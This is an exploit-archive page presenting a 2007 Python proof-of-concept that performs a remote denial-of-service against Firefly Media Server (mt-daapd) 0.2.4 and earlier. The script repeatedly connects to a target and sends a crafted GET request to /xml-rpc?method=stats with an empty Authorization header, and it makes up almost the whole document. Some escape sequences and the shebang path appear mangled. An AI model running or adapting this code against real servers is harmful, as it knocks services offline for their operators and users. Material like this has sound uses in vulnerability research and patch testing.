Firefly Media Server <= 0.2.4 Remote Denial of Service Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Firefly Media Server <= 0.2.4 Remote Denial of Service Exploit
# Published : 2007-11-02
# Author : nnp
# Previous Title : Viewpoint Media Player for IE 3.2 Remote Stack Overflow PoC
# Next Title : Ubuntu 6.06 DHCPd bug Remote Denial of Service Exploit

#!C:python25python25.exe

"""
Advisory : [UPH-07-02]
mt-dappd/Firefly media server remote DoS
Discovered by nnp
http://www.unprotectedhex.com
"""

import sys
import socket
import time

if len(sys.argv) != 3:
    sys.exit(-1)

kill_msg = """GET /xml-rpc?method=stats HTTP/1.1rn 
Authorization:rnrn"""

host = sys.argv[1]
port = sys.argv[2]

print '[+] Host : ' + host
print '[+] Port : ' + port

print "[+] Sending "
print kill_msg

ctr = 1
while 1:
    print '[+] Ctr : ' + str(ctr)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, int(port)))
    s.send(kill_msg)
    s.close()
    ctr += 1

# www.Syue.com [2007-11-02]